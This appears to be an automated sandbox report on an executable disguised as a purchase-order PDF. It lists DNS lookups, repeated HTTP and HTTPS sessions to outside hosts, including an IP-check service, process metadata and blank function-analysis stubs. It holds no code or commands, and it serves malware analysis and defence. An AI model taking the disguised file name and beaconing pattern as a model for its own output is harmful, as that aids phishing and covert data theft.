| Dec 19, 2024 15:29:23.930536032 CET | 51511 | 53 | 192.168.2.5 | 1.1.1.1 |
| Dec 19, 2024 15:29:24.069997072 CET | 53 | 51511 | 1.1.1.1 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.782740116 CET | 61006 | 53 | 192.168.2.5 | 1.1.1.1 |
| Dec 19, 2024 15:29:29.919830084 CET | 53 | 61006 | 1.1.1.1 | 192.168.2.5 |
| Dec 19, 2024 15:29:32.160598993 CET | 62362 | 53 | 192.168.2.5 | 1.1.1.1 |
| Dec 19, 2024 15:29:32.305747986 CET | 53 | 62362 | 1.1.1.1 | 192.168.2.5 |
| Dec 19, 2024 15:29:39.969598055 CET | 54798 | 53 | 192.168.2.5 | 1.1.1.1 |
| Dec 19, 2024 15:29:40.107425928 CET | 53 | 54798 | 1.1.1.1 | 192.168.2.5 |
| Dec 19, 2024 15:30:40.116313934 CET | 55274 | 53 | 192.168.2.5 | 1.1.1.1 |
| Dec 19, 2024 15:30:40.337245941 CET | 53 | 55274 | 1.1.1.1 | 192.168.2.5 |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Dec 19, 2024 15:29:20.939297915 CET | 192.168.2.5 | 1.1.1.1 | 0xca5 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Dec 19, 2024 15:29:23.930536032 CET | 192.168.2.5 | 1.1.1.1 | 0x3bfa | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Dec 19, 2024 15:29:29.782740116 CET | 192.168.2.5 | 1.1.1.1 | 0x2b9 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Dec 19, 2024 15:29:32.160598993 CET | 192.168.2.5 | 1.1.1.1 | 0x25a1 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Dec 19, 2024 15:29:39.969598055 CET | 192.168.2.5 | 1.1.1.1 | 0xd70c | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Dec 19, 2024 15:30:40.116313934 CET | 192.168.2.5 | 1.1.1.1 | 0xfe4d | Standard query (0) | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Dec 19, 2024 15:29:21.076962948 CET | 1.1.1.1 | 192.168.2.5 | 0xca5 | No error (0) | 216.58.208.238 | A (IP address) | IN (0x0001) | false | ||
| Dec 19, 2024 15:29:24.069997072 CET | 1.1.1.1 | 192.168.2.5 | 0x3bfa | No error (0) | 172.217.17.65 | A (IP address) | IN (0x0001) | false | ||
| Dec 19, 2024 15:29:29.919830084 CET | 1.1.1.1 | 192.168.2.5 | 0x2b9 | No error (0) | checkip.dyndns.com | CNAME (Canonical name) | IN (0x0001) | false | ||
| Dec 19, 2024 15:29:29.919830084 CET | 1.1.1.1 | 192.168.2.5 | 0x2b9 | No error (0) | 132.226.247.73 | A (IP address) | IN (0x0001) | false | ||
| Dec 19, 2024 15:29:29.919830084 CET | 1.1.1.1 | 192.168.2.5 | 0x2b9 | No error (0) | 132.226.8.169 | A (IP address) | IN (0x0001) | false | ||
| Dec 19, 2024 15:29:29.919830084 CET | 1.1.1.1 | 192.168.2.5 | 0x2b9 | No error (0) | 158.101.44.242 | A (IP address) | IN (0x0001) | false | ||
| Dec 19, 2024 15:29:29.919830084 CET | 1.1.1.1 | 192.168.2.5 | 0x2b9 | No error (0) | 193.122.6.168 | A (IP address) | IN (0x0001) | false | ||
| Dec 19, 2024 15:29:29.919830084 CET | 1.1.1.1 | 192.168.2.5 | 0x2b9 | No error (0) | 193.122.130.0 | A (IP address) | IN (0x0001) | false | ||
| Dec 19, 2024 15:29:32.305747986 CET | 1.1.1.1 | 192.168.2.5 | 0x25a1 | No error (0) | 104.21.67.152 | A (IP address) | IN (0x0001) | false | ||
| Dec 19, 2024 15:29:32.305747986 CET | 1.1.1.1 | 192.168.2.5 | 0x25a1 | No error (0) | 172.67.177.134 | A (IP address) | IN (0x0001) | false | ||
| Dec 19, 2024 15:29:40.107425928 CET | 1.1.1.1 | 192.168.2.5 | 0xd70c | No error (0) | 149.154.167.220 | A (IP address) | IN (0x0001) | false | ||
| Dec 19, 2024 15:30:40.337245941 CET | 1.1.1.1 | 192.168.2.5 | 0xfe4d | No error (0) | 149.154.167.220 | A (IP address) | IN (0x0001) | false |
|
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.5 | 49733 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Dec 19, 2024 15:29:30.046780109 CET | 151 | OUT | |
| Dec 19, 2024 15:29:31.375972986 CET | 321 | IN | |
| Dec 19, 2024 15:29:31.381685019 CET | 127 | OUT | |
| Dec 19, 2024 15:29:31.858283043 CET | 321 | IN | |
| Dec 19, 2024 15:29:39.514564991 CET | 127 | OUT | |
| Dec 19, 2024 15:29:39.965440035 CET | 321 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.5 | 49761 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Dec 19, 2024 15:29:42.443367004 CET | 127 | OUT | |
| Dec 19, 2024 15:29:43.795205116 CET | 321 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 2 | 192.168.2.5 | 49772 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Dec 19, 2024 15:29:46.028143883 CET | 151 | OUT | |
| Dec 19, 2024 15:29:47.349688053 CET | 321 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 3 | 192.168.2.5 | 49781 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Dec 19, 2024 15:29:49.521976948 CET | 151 | OUT | |
| Dec 19, 2024 15:29:50.827419996 CET | 321 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 4 | 192.168.2.5 | 49791 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Dec 19, 2024 15:29:53.120652914 CET | 151 | OUT | |
| Dec 19, 2024 15:29:54.436521053 CET | 321 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 5 | 192.168.2.5 | 49802 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Dec 19, 2024 15:29:56.689657927 CET | 151 | OUT | |
| Dec 19, 2024 15:29:58.008605003 CET | 321 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 6 | 192.168.2.5 | 49811 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Dec 19, 2024 15:30:00.156553030 CET | 151 | OUT | |
| Dec 19, 2024 15:30:06.891166925 CET | 321 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 7 | 192.168.2.5 | 49833 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Dec 19, 2024 15:30:09.131577969 CET | 151 | OUT | |
| Dec 19, 2024 15:30:19.378699064 CET | 321 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 8 | 192.168.2.5 | 49864 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Dec 19, 2024 15:30:21.603665113 CET | 151 | OUT | |
| Dec 19, 2024 15:30:23.809283972 CET | 321 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 9 | 192.168.2.5 | 49877 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Dec 19, 2024 15:30:26.205121994 CET | 151 | OUT | |
| Dec 19, 2024 15:30:28.553240061 CET | 321 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 10 | 192.168.2.5 | 49889 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Dec 19, 2024 15:30:30.846122026 CET | 151 | OUT | |
| Dec 19, 2024 15:30:32.161087990 CET | 321 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 11 | 192.168.2.5 | 49899 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Dec 19, 2024 15:30:34.371108055 CET | 151 | OUT | |
| Dec 19, 2024 15:30:35.676954031 CET | 321 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 12 | 192.168.2.5 | 49908 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Dec 19, 2024 15:30:37.811099052 CET | 151 | OUT | |
| Dec 19, 2024 15:30:40.115158081 CET | 321 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 13 | 192.168.2.5 | 49923 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Dec 19, 2024 15:30:42.523655891 CET | 151 | OUT | |
| Dec 19, 2024 15:30:43.826448917 CET | 321 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 14 | 192.168.2.5 | 49931 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Dec 19, 2024 15:30:45.977520943 CET | 151 | OUT | |
| Dec 19, 2024 15:30:48.282063961 CET | 321 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 15 | 192.168.2.5 | 49942 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Dec 19, 2024 15:30:50.445310116 CET | 151 | OUT | |
| Dec 19, 2024 15:30:51.756139040 CET | 321 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 16 | 192.168.2.5 | 49952 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Dec 19, 2024 15:30:53.903964043 CET | 151 | OUT | |
| Dec 19, 2024 15:30:55.210642099 CET | 321 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 17 | 192.168.2.5 | 49961 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Dec 19, 2024 15:30:57.381041050 CET | 151 | OUT | |
| Dec 19, 2024 15:30:59.684894085 CET | 321 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 18 | 192.168.2.5 | 49973 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Dec 19, 2024 15:31:01.950740099 CET | 151 | OUT | |
| Dec 19, 2024 15:31:03.239947081 CET | 321 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.5 | 49713 | 216.58.208.238 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-12-19 14:29:23 UTC | 216 | OUT | |
| 2024-12-19 14:29:23 UTC | 1920 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.5 | 49720 | 172.217.17.65 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-12-19 14:29:25 UTC | 258 | OUT | |
| 2024-12-19 14:29:28 UTC | 4941 | IN | |
| 2024-12-19 14:29:28 UTC | 4941 | IN | |
| 2024-12-19 14:29:28 UTC | 4816 | IN | |
| 2024-12-19 14:29:28 UTC | 1323 | IN | |
| 2024-12-19 14:29:28 UTC | 1390 | IN | |
| 2024-12-19 14:29:29 UTC | 1390 | IN | |
| 2024-12-19 14:29:29 UTC | 1390 | IN | |
| 2024-12-19 14:29:29 UTC | 1390 | IN | |
| 2024-12-19 14:29:29 UTC | 1390 | IN | |
| 2024-12-19 14:29:29 UTC | 1390 | IN | |
| 2024-12-19 14:29:29 UTC | 1390 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 2 | 192.168.2.5 | 49738 | 104.21.67.152 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-12-19 14:29:33 UTC | 85 | OUT | |
| 2024-12-19 14:29:33 UTC | 872 | IN | |
| 2024-12-19 14:29:33 UTC | 362 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 3 | 192.168.2.5 | 49756 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-12-19 14:29:41 UTC | 296 | OUT | |
| 2024-12-19 14:29:41 UTC | 1090 | OUT | |
| 2024-12-19 14:29:42 UTC | 388 | IN | |
| 2024-12-19 14:29:42 UTC | 544 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 4 | 192.168.2.5 | 49766 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-12-19 14:29:45 UTC | 296 | OUT | |
| 2024-12-19 14:29:45 UTC | 1090 | OUT | |
| 2024-12-19 14:29:45 UTC | 388 | IN | |
| 2024-12-19 14:29:45 UTC | 543 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 5 | 192.168.2.5 | 49776 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-12-19 14:29:48 UTC | 272 | OUT | |
| 2024-12-19 14:29:48 UTC | 1090 | OUT | |
| 2024-12-19 14:29:49 UTC | 388 | IN | |
| 2024-12-19 14:29:49 UTC | 543 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 6 | 192.168.2.5 | 49785 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-12-19 14:29:52 UTC | 272 | OUT | |
| 2024-12-19 14:29:52 UTC | 1090 | OUT | |
| 2024-12-19 14:29:52 UTC | 388 | IN | |
| 2024-12-19 14:29:52 UTC | 543 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 7 | 192.168.2.5 | 49796 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-12-19 14:29:55 UTC | 296 | OUT | |
| 2024-12-19 14:29:55 UTC | 1090 | OUT | |
| 2024-12-19 14:29:56 UTC | 388 | IN | |
| 2024-12-19 14:29:56 UTC | 543 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 8 | 192.168.2.5 | 49806 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-12-19 14:29:59 UTC | 272 | OUT | |
| 2024-12-19 14:29:59 UTC | 1090 | OUT | |
| 2024-12-19 14:30:00 UTC | 388 | IN | |
| 2024-12-19 14:30:00 UTC | 543 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 9 | 192.168.2.5 | 49827 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-12-19 14:30:08 UTC | 272 | OUT | |
| 2024-12-19 14:30:08 UTC | 1090 | OUT | |
| 2024-12-19 14:30:08 UTC | 388 | IN | |
| 2024-12-19 14:30:08 UTC | 543 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 10 | 192.168.2.5 | 49859 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-12-19 14:30:20 UTC | 296 | OUT | |
| 2024-12-19 14:30:20 UTC | 1090 | OUT | |
| 2024-12-19 14:30:21 UTC | 388 | IN | |
| 2024-12-19 14:30:21 UTC | 543 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 11 | 192.168.2.5 | 49871 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-12-19 14:30:25 UTC | 272 | OUT | |
| 2024-12-19 14:30:25 UTC | 1090 | OUT | |
| 2024-12-19 14:30:25 UTC | 388 | IN | |
| 2024-12-19 14:30:25 UTC | 543 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 12 | 192.168.2.5 | 49883 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-12-19 14:30:29 UTC | 296 | OUT | |
| 2024-12-19 14:30:29 UTC | 1090 | OUT | |
| 2024-12-19 14:30:30 UTC | 388 | IN | |
| 2024-12-19 14:30:30 UTC | 543 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 13 | 192.168.2.5 | 49893 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-12-19 14:30:33 UTC | 272 | OUT | |
| 2024-12-19 14:30:33 UTC | 1090 | OUT | |
| 2024-12-19 14:30:34 UTC | 388 | IN | |
| 2024-12-19 14:30:34 UTC | 543 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 14 | 192.168.2.5 | 49904 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-12-19 14:30:37 UTC | 272 | OUT | |
| 2024-12-19 14:30:37 UTC | 1090 | OUT | |
| 2024-12-19 14:30:37 UTC | 388 | IN | |
| 2024-12-19 14:30:37 UTC | 543 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 15 | 192.168.2.5 | 49917 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-12-19 14:30:41 UTC | 272 | OUT | |
| 2024-12-19 14:30:41 UTC | 1090 | OUT | |
| 2024-12-19 14:30:42 UTC | 388 | IN | |
| 2024-12-19 14:30:42 UTC | 543 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 16 | 192.168.2.5 | 49925 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-12-19 14:30:45 UTC | 272 | OUT | |
| 2024-12-19 14:30:45 UTC | 1090 | OUT | |
| 2024-12-19 14:30:45 UTC | 388 | IN | |
| 2024-12-19 14:30:45 UTC | 543 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 17 | 192.168.2.5 | 49937 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-12-19 14:30:49 UTC | 272 | OUT | |
| 2024-12-19 14:30:49 UTC | 1090 | OUT | |
| 2024-12-19 14:30:50 UTC | 388 | IN | |
| 2024-12-19 14:30:50 UTC | 543 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 18 | 192.168.2.5 | 49947 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-12-19 14:30:53 UTC | 296 | OUT | |
| 2024-12-19 14:30:53 UTC | 1090 | OUT | |
| 2024-12-19 14:30:53 UTC | 388 | IN | |
| 2024-12-19 14:30:53 UTC | 543 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 19 | 192.168.2.5 | 49955 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-12-19 14:30:56 UTC | 296 | OUT | |
| 2024-12-19 14:30:56 UTC | 1090 | OUT | |
| 2024-12-19 14:30:57 UTC | 388 | IN | |
| 2024-12-19 14:30:57 UTC | 543 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 20 | 192.168.2.5 | 49967 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-12-19 14:31:01 UTC | 296 | OUT | |
| 2024-12-19 14:31:01 UTC | 1090 | OUT | |
| 2024-12-19 14:31:01 UTC | 388 | IN | |
| 2024-12-19 14:31:01 UTC | 543 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 21 | 192.168.2.5 | 49979 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-12-19 14:31:06 UTC | 296 | OUT | |
| 2024-12-19 14:31:06 UTC | 1090 | OUT | |
| 2024-12-19 14:31:07 UTC | 388 | IN | |
| 2024-12-19 14:31:07 UTC | 541 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
| Target ID: | 0 |
| Start time: | 09:28:58 |
| Start date: | 19/12/2024 |
| Path: | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x400000 |
| File size: | 477'600 bytes |
| MD5 hash: | 745504717878BB22B600DF7E2C2DD9F4 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Yara matches: |
|
| Reputation: | low |
| Has exited: | true |
| Target ID: | 3 |
| Start time: | 09:29:14 |
| Start date: | 19/12/2024 |
| Path: | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x400000 |
| File size: | 477'600 bytes |
| MD5 hash: | 745504717878BB22B600DF7E2C2DD9F4 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Yara matches: |
|
| Reputation: | low |
| Has exited: | false |
Execution Graph
| Execution Coverage: | 21.4% |
| Dynamic/Decrypted Code Coverage: | 13.9% |
| Signature Coverage: | 25% |
| Total number of Nodes: | 1517 |
| Total number of Limit Nodes: | 46 |
Graph
Function 004032A0 Relevance: 89.7, APIs: 32, Strings: 19, Instructions: 401stringfilecomCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00404B30 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Control-flow Graph
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00406077 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 207stringCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00405846 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00406398 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
Download Yara Rule
| APIs |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 004027FB Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0040389E Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215stringregistryCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Control-flow Graph
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00401767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Control-flow Graph
| APIs |
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
